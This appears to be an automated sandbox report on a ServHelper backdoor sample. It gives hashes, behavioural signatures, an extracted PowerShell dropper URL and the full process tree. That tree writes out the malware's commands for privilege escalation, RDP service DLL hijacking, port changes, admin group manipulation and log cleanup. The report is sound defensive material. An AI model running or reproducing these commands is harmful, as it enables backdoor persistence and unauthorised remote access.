servhelper | 8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0

Analysis

max time kernel
91s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
29-01-2023 17:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe
Size

4.6MB
MD5

62bb4a8734cacaaea9605ea3b282b6b7
SHA1

134a17660b9c64e35a75c175fa9f5c4bec5b2835
SHA256

8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0
SHA512

15b68c65653c7446af02a1c548b7b19a12c9328b5170a0b4f9635eacf11cc62fe8862378f237a97acf68974183904410de5c51ddc4380675cec2d4459c7e06cd
SSDEEP

49152:AHy5JqSxFHuTWN5wqqOvAbCI8whLT5Xz+HavHxp7dU/V4ZNEgyU1:b5JqSxFHuTp+

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow pid process

35 412 powershell.exe
39 412 powershell.exe
43 412 powershell.exe
45 412 powershell.exe
48 412 powershell.exe
51 412 powershell.exe
54 412 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2004 takeown.exe
4524 icacls.exe
1432 icacls.exe
2876 icacls.exe
2972 icacls.exe
2636 icacls.exe
4536 icacls.exe
4584 icacls.exe

flow	pid	process
35	412	powershell.exe
39	412	powershell.exe
43	412	powershell.exe
45	412	powershell.exe
48	412	powershell.exe
51	412	powershell.exe
54	412	powershell.exe

pid	process
2004	takeown.exe
4524	icacls.exe
1432	icacls.exe
2876	icacls.exe
2972	icacls.exe
2636	icacls.exe
4536	icacls.exe
4584	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2544
2544
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4536 icacls.exe
4584 icacls.exe
2004 takeown.exe
4524 icacls.exe
1432 icacls.exe
2876 icacls.exe
2972 icacls.exe
2636 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2544
2544

pid	process
4536	icacls.exe
4584	icacls.exe
2004	takeown.exe
4524	icacls.exe
1432	icacls.exe
2876	icacls.exe
2972	icacls.exe
2636	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI37FA.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI381A.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fct1ykgd.1bm.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI37B9.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI383A.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zoae3gmy.pza.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI37DA.tmp	powershell.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2796 timeout.exe

pid	process
2796	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 89be75672cbed801	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4680 reg.exe
Runs net.exe

pid	process
4680	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	43	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3416	powershell.exe
3416	powershell.exe
4088	powershell.exe
4088	powershell.exe
4164	powershell.exe
4164	powershell.exe
3528	powershell.exe
3528	powershell.exe
3416	powershell.exe
3416	powershell.exe
3416	powershell.exe
412	powershell.exe
412	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

656
656

pid	process
656
656

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeRestorePrivilege	1432	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3848	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3848	WMIC.exe
Token: SeAuditPrivilege	3848	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3848	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3848	WMIC.exe
Token: SeAuditPrivilege	3848	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3756	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3756	WMIC.exe
Token: SeAuditPrivilege	3756	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3756	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3756	WMIC.exe
Token: SeAuditPrivilege	3756	WMIC.exe
Token: SeDebugPrivilege	412	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4252 wrote to memory of 3416	4252	8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe	powershell.exe
PID 4252 wrote to memory of 3416	4252	8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe	powershell.exe
PID 3416 wrote to memory of 3660	3416	powershell.exe	csc.exe
PID 3416 wrote to memory of 3660	3416	powershell.exe	csc.exe
PID 3660 wrote to memory of 1844	3660	csc.exe	cvtres.exe
PID 3660 wrote to memory of 1844	3660	csc.exe	cvtres.exe
PID 3416 wrote to memory of 1032	3416	powershell.exe	csc.exe
PID 3416 wrote to memory of 1032	3416	powershell.exe	csc.exe
PID 1032 wrote to memory of 2716	1032	csc.exe	cvtres.exe
PID 1032 wrote to memory of 2716	1032	csc.exe	cvtres.exe
PID 3416 wrote to memory of 4088	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 4088	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 4164	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 4164	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 3528	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 3528	3416	powershell.exe	powershell.exe
PID 3416 wrote to memory of 2004	3416	powershell.exe	takeown.exe
PID 3416 wrote to memory of 2004	3416	powershell.exe	takeown.exe
PID 3416 wrote to memory of 4524	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 4524	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 1432	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 1432	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2876	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2876	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2972	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2972	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2636	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2636	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 4536	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 4536	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 4584	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 4584	3416	powershell.exe	icacls.exe
PID 3416 wrote to memory of 2968	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 2968	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 4680	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 4680	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 1888	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 1888	3416	powershell.exe	reg.exe
PID 3416 wrote to memory of 4756	3416	powershell.exe	net.exe
PID 3416 wrote to memory of 4756	3416	powershell.exe	net.exe
PID 4756 wrote to memory of 3104	4756	net.exe	net1.exe
PID 4756 wrote to memory of 3104	4756	net.exe	net1.exe
PID 3416 wrote to memory of 2132	3416	powershell.exe	cmd.exe
PID 3416 wrote to memory of 2132	3416	powershell.exe	cmd.exe
PID 2132 wrote to memory of 1264	2132	cmd.exe	cmd.exe
PID 2132 wrote to memory of 1264	2132	cmd.exe	cmd.exe
PID 1264 wrote to memory of 3952	1264	cmd.exe	net.exe
PID 1264 wrote to memory of 3952	1264	cmd.exe	net.exe
PID 3952 wrote to memory of 2140	3952	net.exe	net1.exe
PID 3952 wrote to memory of 2140	3952	net.exe	net1.exe
PID 3416 wrote to memory of 2852	3416	powershell.exe	cmd.exe
PID 3416 wrote to memory of 2852	3416	powershell.exe	cmd.exe
PID 2852 wrote to memory of 5108	2852	cmd.exe	cmd.exe
PID 2852 wrote to memory of 5108	2852	cmd.exe	cmd.exe
PID 5108 wrote to memory of 4028	5108	cmd.exe	net.exe
PID 5108 wrote to memory of 4028	5108	cmd.exe	net.exe
PID 4028 wrote to memory of 804	4028	net.exe	net1.exe
PID 4028 wrote to memory of 804	4028	net.exe	net1.exe
PID 3320 wrote to memory of 5004	3320	cmd.exe	net.exe
PID 3320 wrote to memory of 5004	3320	cmd.exe	net.exe
PID 5004 wrote to memory of 1344	5004	net.exe	net1.exe
PID 5004 wrote to memory of 1344	5004	net.exe	net1.exe
PID 1388 wrote to memory of 1216	1388	cmd.exe	net.exe
PID 1388 wrote to memory of 1216	1388	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe
"C:\Users\Admin\AppData\Local\Temp\8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qo5zeajd\qo5zeajd.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1F8.tmp" "c:\Users\Admin\AppData\Local\Temp\qo5zeajd\CSCB831381AC902433DB998A28D57C72233.TMP"
4⤵
PID:1844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ac2ztvel\ac2ztvel.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7B5.tmp" "c:\Users\Admin\AppData\Local\Temp\ac2ztvel\CSCCB8624BBCA0449EB8BCB23B01656B891.TMP"
4⤵
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2004

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4524

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2876

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2972

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2636

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4536

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4584

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2968

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:4680

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1888

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:4756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:3104

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2140

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:5108

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:804

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4608

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3976

C:\Windows\system32\cmd.exe
